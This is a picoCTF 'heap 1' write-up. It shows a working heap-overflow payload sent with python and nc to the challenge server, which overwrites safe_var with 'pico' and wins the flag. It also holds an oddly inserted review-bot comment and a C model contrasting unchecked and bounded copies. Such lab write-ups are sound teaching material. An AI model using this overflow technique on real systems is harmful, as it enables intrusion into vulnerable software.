100 points
Category: Binary Exploitation
Tags: #binaryexploitation #heap #bufferoverflow
Can you control your overflow?
Binary and source are provided for this challenge.
Inspecting the chall.c source file, it looks to be a modified version of the heap 0 challenge, so a diff between the two shows what changed:
diff ../heap-0/chall.c chall.c
16c16
< if (strcmp(safe_var, "bico") != 0) {
---
> if (!strcmp(safe_var, "pico")) {
47c47
< printf("\nWelcome to heap0!\n");
---
> printf("\nWelcome to heap1!\n");
88,99c88
< int rval = scanf("%d", &choice);
< if (rval == EOF){
< exit(0);
< }
< if (rval != 1) {
< //printf("Invalid input. Please enter a valid choice.\n");
< //fflush(stdout);
< // Clear input buffer
< //while (getchar() != '\n');
< //continue;
< exit(0);
< }
---
> if (scanf("%d", &choice) != 1) exit(0);
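Review bot: the collapsed check at line 88 preserves the old behaviour rather than changing it: scanf returns EOF on end of input, EOF is != 1, and both the old EOF branch and the old rval != 1 branch called exit(0), so any non-numeric or missing menu choice still terminates the program. Note that the commented-out recovery code (re-printing the prompt and draining the input buffer with getchar) is removed rather than restored, so the menu never re-prompts on bad input; if that was intended, a comment saying so would avoid a future reader reinstating it.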
So now our challenge is to cause an overflow, but construct it such that safe_var is rewritten with known data; in this case it must be equal to "pico", as seen in the updated conditional statement above.
A minor modification to our existing attack for heap 0 is enough: increase the overflow so that the required safe_var contents land at the correct position (the offset is again 32 bytes, as obtained from the addresses displayed by the challenge executable), such that the input payload:
- Selects menu item 2 "Write to Buffer" = "2\n"
- Overflows the input_data buffer to reach the start of the safe_var buffer by outputting 32 "A" characters = "A"*32
- Continues the overflow to write "pico" into the safe_var buffer, completing the input string to be written = "pico\n"
- Selects menu item 4 "Print Flag" = "4\n"
Which yields the following output:
$ echo $(python3 -c 'print("2\n" + "A"*32 + "pico\n4\n")') | nc tethys.picoctf.net 64934
Welcome to heap1!
I put my data on the heap so it should be safe from any tampering.
Since my data isn't on the stack I'll even let you write whatever info you want to the heap, I already took care of using malloc for you.
Heap State:
+-------------+----------------+
[*] Address -> Heap Data
+-------------+----------------+
[*] 0x556535d462b0 -> pico
+-------------+----------------+
[*] 0x556535d462d0 -> bico
+-------------+----------------+
1. Print Heap: (print the current state of the heap)
2. Write to buffer: (write to your own personal block of data on the heap)
3. Print safe_var: (I'll even let you look at my variable on the heap, I'm confident it can't be modified)
4. Print Flag: (Try to print the flag, good luck)
5. Exit
Enter your choice: Data for buffer:
1. Print Heap: (print the current state of the heap)
2. Write to buffer: (write to your own personal block of data on the heap)
3. Print safe_var: (I'll even let you look at my variable on the heap, I'm confident it can't be modified)
4. Print Flag: (Try to print the flag, good luck)
5. Exit
Enter your choice:
YOU WIN
picoCTF{...........redacted.............}
Where the actual flag value has been redacted for the purposes of this write-up.
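To make the mechanism concrete, here is an added model of the heap layout the binary prints, written for this write-up and not taken from the challenge's chall.c. It assumes, as the printed addresses (0x...2b0 and 0x...2d0) indicate, that safe_var begins exactly 32 bytes after input_data, and it represents both chunks as one flat 64-byte array rather than real malloc chunks. It runs the same buffer contents (32 filler bytes followed by "pico") through an unchecked copy and through a bounded copy, so you can see both why the overflow satisfies the binary's check and what the fix looks like; the names heap_model, write_unbounded, write_bounded and win_condition are this example's own.

```c
#include <stdio.h>
#include <string.h>

/* Added model of the heap layout printed by the challenge binary:
 * input_data occupies the first 32 bytes of the region and safe_var
 * starts 32 bytes later (0x...2b0 -> 0x...2d0). It is a flat array,
 * not real malloc chunks, and is not the challenge's own chall.c. */
#define CHUNK_SIZE 32
#define REGION_SIZE (2 * CHUNK_SIZE)

struct heap_model {
    char region[REGION_SIZE];   /* input_data = region, safe_var = region + CHUNK_SIZE */
};

static void heap_model_init(struct heap_model *h)
{
    memset(h->region, 0, sizeof h->region);
    /* safe_var starts out as "bico", as the "Print Heap" output shows */
    strcpy(h->region + CHUNK_SIZE, "bico");
}

static const char *safe_var(const struct heap_model *h)
{
    return h->region + CHUNK_SIZE;
}

/* The condition the heap1 binary checks before printing the flag */
static int win_condition(const struct heap_model *h)
{
    return strcmp(safe_var(h), "pico") == 0;
}

/* Unbounded write: copies the whole string into input_data, the way an
 * unchecked strcpy would, so every byte past the 32nd lands in safe_var.
 * (The copy is clamped to the model region only so the model itself
 * stays in bounds.) */
static void write_unbounded(struct heap_model *h, const char *data)
{
    size_t n = strlen(data);
    if (n >= REGION_SIZE)
        n = REGION_SIZE - 1;
    memcpy(h->region, data, n);
    h->region[n] = '\0';
}

/* Bounded write: the fix. Anything that does not fit in input_data's own
 * chunk (31 characters plus the terminator) is rejected outright instead
 * of spilling into the neighbouring chunk. Returns 0 on success, -1 if
 * rejected. */
static int write_bounded(struct heap_model *h, const char *data)
{
    size_t n = strlen(data);
    if (n >= CHUNK_SIZE)
        return -1;
    memcpy(h->region, data, n + 1);
    return 0;
}

/* Builds the write-up's buffer contents: 32 filler bytes followed by
 * "pico". Constructed here; the menu selections "2" and "4" are not part
 * of the buffer data itself. */
static void build_payload(char *out, size_t out_size)
{
    memset(out, 0, out_size);
    memset(out, 'A', CHUNK_SIZE);
    strcpy(out + CHUNK_SIZE, "pico");
}

/* Runs the payload through one write routine and reports whether the
 * binary's win condition would now hold: 1 = safe_var became "pico". */
static int payload_reaches_safe_var(int bounded)
{
    struct heap_model h;
    char payload[REGION_SIZE];
    heap_model_init(&h);
    build_payload(payload, sizeof payload);
    if (bounded)
        write_bounded(&h, payload);
    else
        write_unbounded(&h, payload);
    return win_condition(&h);
}

/* Sanity check on the fix: a short input is still stored in input_data
 * and safe_var is left untouched. Returns 1 on success. */
static int bounded_write_keeps_short_input(void)
{
    struct heap_model h;
    heap_model_init(&h);
    if (write_bounded(&h, "hello") != 0)
        return 0;
    return strcmp(h.region, "hello") == 0 && strcmp(safe_var(&h), "bico") == 0;
}

int main(void)
{
    printf("unchecked copy: safe_var overwritten to \"pico\": %d\n",
           payload_reaches_safe_var(0));
    printf("bounded copy:   safe_var overwritten to \"pico\": %d\n",
           payload_reaches_safe_var(1));
    printf("bounded copy keeps short input: %d\n",
           bounded_write_keeps_short_input());
    return 0;
}
```

The bounded variant rejects over-long input rather than truncating it silently; truncation would also protect safe_var, but an explicit rejection makes the failure visible to the caller and, in a real program, gives you something to log.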